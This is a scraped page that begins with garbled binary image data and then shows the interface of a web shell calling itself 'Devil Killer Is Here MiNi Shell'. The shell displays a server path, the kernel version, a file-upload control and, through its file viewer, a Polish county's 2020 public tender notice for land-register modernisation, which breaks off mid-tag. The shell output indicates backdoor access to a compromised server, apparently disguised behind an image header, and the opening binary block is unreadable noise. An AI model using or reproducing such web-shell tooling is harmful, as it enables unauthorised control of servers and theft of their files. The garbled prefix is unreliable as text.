JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20200806/571978-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 571978-N-2020 z dnia 2020-08-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Grodziski</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Modernizacja ewidencji gruntów i budynków dla wybranych obrębów z jednostki ewidencyjnej gmina Grodzisk Mazowiecki ( 140405_5): obręb Odrano Wola ( 140504_5.0025), obręb Wólka Grodziska ( 140504_5.0033) w powiecie grodziskim</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Grodziski</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">01326910800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">30</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05-825</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Grodzisk Mazowiecki</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48(22)7241833</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zp@powiat-grodziski.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">+48(22)7243049</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.powiat-grodziski.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"> http://www.bip.powiat-grodziski.pl/index.php?cmd=przetargi&opt=wykaz</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Tak pocztą na adres</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Kościuszki 30, kod 05-825 Grodzisk Mazowiecki</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Modernizacja ewidencji gruntów i budynków dla wybranych obrębów z jednostki ewidencyjnej gmina Grodzisk Mazowiecki ( 140405_5): obręb Odrano Wola ( 140504_5.0025), obręb Wólka Grodziska ( 140504_5.0033) w powiecie grodziskim</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.272.1.8.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">maksymalnej liczby części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci">2</span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">3.1.	Przedmiotem zamówienia jest wykonanie modernizacji ewidencji gruntów i budynków zgodnie z projektem modernizacji uzgodnionym przez Mazowieckiego Wojewódzkiego Inspektora Nadzoru Geodezyjnego i Kartograficznego, dla dwóch obrębów obszaru wiejskiego gminy Grodzisk Mazowiecki w powiecie grodziskim , w podziale na części: część nr 1 – wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Odrano Wola (140504_5.0025).	część nr 2 - wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Wólka Grodziska (140504_5.0033).3.2.	Do obowiązków Wykonawcy związanych z modernizacją ewidencji gruntów i budynków należeć będzie:1)	analiza materiałów przekazanych Wykonawcy do realizacji zadania,2)	wykonanie badania ksiąg wieczystych wykazanych w ewidencji gruntów pod względem zgodności treści ujawnionej w dziale I KW z danymi przedmiotowymi rejestru ewidencji gruntów. W przypadku stwierdzenia rozbieżności oznaczenia nieruchomości należy zbadać dokumenty złożone do księgi wieczystej pod względem istnienia map lub planów możliwych do wykorzystania w procesie modernizacji. Z przeprowadzonych porównań i badań dokumentów geodezyjnych złożonych do księgi wieczystej, Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;3)	dokonanie weryfikacji poprawności wpisów praw do działek ewidencyjnych:a)	co do których w prowadzonym rejestrze gruntów brak jest ustalonego właściciela, a także ustalonego tytułu do działki, a w rejestrze gruntów wykazani są: samoistni posiadacze, władający i użytkownicy. b)	co do których w prowadzonym rejestrze gruntów jako właściciel wykazany jest Skarb Państwa, lub Jednostka Samorządu Terytorialnego, zaś jako użytkownik wieczysty, użytkownik, zarządca, lub trwały zarządca wpisany jest inny podmiot.c)	co do których wykazane są inne podmioty, które władają lub gospodarują nieruchomościami Skarbu Państwa lub jednostek samorządu terytorialnego. Z przeprowadzonych porównań Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;4)	pozyskanie danych do uzupełnienia baz danych dotyczących danych ewidencyjnych budynków o: a)	brakujące budynki, wraz ze wszystkimi danymi ewidencyjnymi dotyczącymi budynków wymienionymi w § 63 ust. 1 rozporządzenia.b)	zweryfikowanie i uzupełnienie informacji o budynkach dotychczas wykazanych w bazie danych opisowych ewidencji gruntów i budynków o dane ewidencyjne budynku wynikające z § 63 ust. 1 p. 2, 4, 5, 6, 8, 9, 11, 12, 14, 15, 16 oraz od 18 do 27 rozporządzenia. W przypadku zmiany przepisów prawa, dotyczących zakresu danych ewidencyjnych budynku, Wykonawca dostosuje zebrane dane o budynkach do treści tego przepisu, według stanu prawnego jaki obowiązywać będzie w dacie na 120 dni, przed upływem terminu umownego zakończenia prac. c)	zweryfikowanie położenia budynków dla których dane zostały pozyskane w wyniku digitalizacji ekranowej rastra, poprzez ich pomiar i sporządzenie wykazów zmian danych ewidencyjnych budynków.5)	zweryfikowanie z materiałami zasobu położenia punktów granicznych;6)	wykonanie pomiaru istniejących punktów osnowy służących do założenia ewidencji – należy odnaleźć i pomierzyć na aktualną osnowę (wykazaną w Banku Osnów) wszystkie odszukane punkty dawnej osnowy wykorzystywanej do założenia ewidencji gruntów. W przypadku gdy pomiar punktów granicznych wykazanych w operatach jednostkowych był wykonywany na osnowę inną niż obecnie wykazana w Banku Osnów, należy odszukać tę osnowę, pomierzyć ją w nawiązaniu do obecnej osnowy a następnie zharmonizować współrzędne w drodze transformacji, a w przypadku braku osnowy należy wykorzystać dane do ustalenia punktów granicznych. 7)	wykonanie ustalenia i pomiaru położenia punktów granicznych zgodnie z §§ 38 i 39 rozporządzenia w sprawie ewidencji gruntów i budynków, w przypadku gdy zachodzą okoliczności o których mowa w § 37 rozporządzenia, oraz przygotowanie w oparciu o wyniki tych pomiarów i ustaleń danych ewidencyjnych wyznaczających z wymaganą dokładnością, (o której mowa w § 29 ust.1 pkt.1 rozporządzenia w sprawie standardów technicznych), położenie punktów granicznych oraz przebieg granic działek ewidencyjnych. 8)	sporządzenie zestawienia uzyskanych powierzchni działek w wyniku harmonizacji danych oraz analiza dokładnościowa uzyskanych współrzędnych.9)	terenowa weryfikacja oraz wykonanie pomiarów uzupełniających w odniesieniu do zmienionych konturów użytków gruntowych ujawnionych w ramach prowadzonych prac modernizacji ewidencji gruntów i budynków zgodnie z zapisami od pkt IV.2.1.1 do pkt IV.2.1.3 projektu modernizacji ewidencji. Kontury użytków gruntowych określone na mapie ewidencyjnej oraz w operatach jednostkowych PZGiK podlegają weryfikacji za pomocą ortofotomapy oraz w drodze wywiadu terenowego. Wyniki porównania treści mapy ewidencyjnej w zakresie konturów użytków gruntowych, uzupełnionej danymi wynikającymi z operatów jednostkowych, z treścią ortofotomapy a także ze stanem faktycznym w terenie stwierdzonym w trakcie wywiadu terenowego, Wykonawca udokumentuje na kopii mapy ewidencyjnej. 10)	przygotowanie projektów dokumentów niezbędnych do wszczęcia z urzędu postępowania w sprawie przeprowadzenia gleboznawczej klasyfikacji gruntów i ich doręczenie stronom postępowania, zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 11)	opracowanie operatu z projektem ustalenia gleboznawczej klasyfikacji gruntów dla zmienionych użytków rolnych i leśnych, o których mowa w punkcie 9 zgodnie z przepisami Rozporządzenia z dnia 12 września 2012 r. w sprawie gleboznawczej klasyfikacji gruntów (Dz. U. poz. 1246), 12)	przygotowanie projektu decyzji o ustaleniu klasyfikacji i jej doręczenie uczestnikom postępowania zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 13)	skompletowanie dokumentacji geodezyjnej, kartograficznej (materiałów i informacji zgromadzonych w państwowym zasobie geodezyjnym i kartograficznym, uzupełnionych w niezbędnym zakresie terenowymi pomiarami geodezyjnymi oraz czynnościami ustalenia przebiegu granic) niezbędnej do wyeliminowania niespójności pomiędzy granicami sąsiadujących ze sobą jednostek ewidencyjnych oraz granicami obrębów ewidencyjnych;14)	opracowanie projektu operatu opisowo-kartograficznego, o którym mowa w art. 24a pkt. 4 ustawy, zwanego dalej „projektem operatu opisowo – kartograficznego”, uwzględniającego rezultaty prac, o których mowa w pkt. 1-11;15)	udział w czynnościach związanych z modernizacją ewidencji gruntów i budynków, o których mowa w art. 24a pkt. 7 ustawy;16)	przygotowanie plików umożliwiających zasilenie baz danych ewidencji gruntów i budynków rezultatami prac modernizacyjnych, w tym zawierających zmiany wynikające z uznania za uzasadnione zarzuty zgłoszone do projektu operatu opisowo-kartograficznego;17)	przygotowanie zawiadomień o zmianach danych ewidencyjnych, zgodnie z §49 rozporządzenia;18)	skompletowanie całości dokumentacji opracowanej w ramach zamówienia i przekazanie jej do państwowego zasobu geodezyjnego i kartograficznego.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71354300-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71353200-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-11-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Etap I Wykonanie prac opisanych od pkt 3.2.1, do pkt 3.2.3, oraz od pkt 3.2.9 do 3.2.11Termin zakończenia prac I etapu – 10 grudnia 2020Wszystkie pozostałe prace i czynności opisane w pkt 3.2 powyższego opisu przedmiotu zamówienia oraz w Projekcie modernizacji ewidencji gruntów a nie zaliczone do Etapu I.Termin zakończenia prac II etapu – 30 listopada 2021 r. (termin podpisania ostatecznego protokołu odbioru prac), przy czym pozytywny protokół kontroli dopuszczający do wyłożenia projektu operatu modernizacji egib do wglądu osób zainteresowanych powinien zostać wystawiony do dn. 15 września 2021 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">5.2.1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: Wykonawca potwierdza spełnianie powyższego warunku załączając do oferty dokumenty potwierdzające posiadanie uprawnień do wykonywania prac geodezyjnych z zakresów nr 1 i nr 2 określonych w art. 43 ustawy z dnia 17 maja 1989 r. – Prawo geodezyjne (t. j. Dz. U. z 2020 r. poz. 276 ze zm.) lub dokumenty pracowników posiadających takie uprawnienia. Na każdą z części zamówienia należy wskazać co najmniej po jednej osobie posiadającej uprawnienia z zakresu nr 1 i po jednej osobie posiadającej uprawnienia z zakresu nr 2. Przy składaniu oferty na dwie części zamówienia osoby te mogą zostać wykazane w obu ofertach jednocześnie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca potwierdza spełnienie powyższego warunku podpisując oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik Nr 3 do SIWZ), </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span 